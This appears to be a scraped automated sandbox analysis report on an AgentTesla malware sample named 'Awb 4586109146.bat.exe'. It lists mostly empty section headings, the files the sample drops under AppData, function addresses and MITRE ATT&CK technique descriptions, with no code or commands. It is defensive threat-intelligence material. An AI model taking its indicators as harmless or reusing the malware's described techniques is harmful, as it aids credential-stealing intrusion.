Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\LangDLL.dll

C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll

C:\Users\user\AppData\Local\sillinesses\Anglomans.ala

C:\Users\user\AppData\Local\sillinesses\Befoulment209.non

C:\Users\user\AppData\Local\sillinesses\Generalists.Bor

C:\Users\user\AppData\Local\sillinesses\Strutskrter.eri

C:\Users\user\AppData\Local\sillinesses\allowanced.bri

C:\Users\user\AppData\Local\sillinesses\atomvaabenlagre.Pal

C:\Users\user\AppData\Local\sillinesses\kartoteksstyring.gla

C:\Users\user\AppData\Local\sillinesses\tubig.txt

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
Awb 4586109146.bat.exe

Function 0040338F Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 410
stringfilecomCOMMON

Function 00405461 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 004059CC Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00403D58 Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Function 004039AA Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402EDD Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 004062DC Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 00405322 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 00403116 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166
COMMON

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Function 00406624 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 004057F1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Function 00405DDF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Function 73961777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre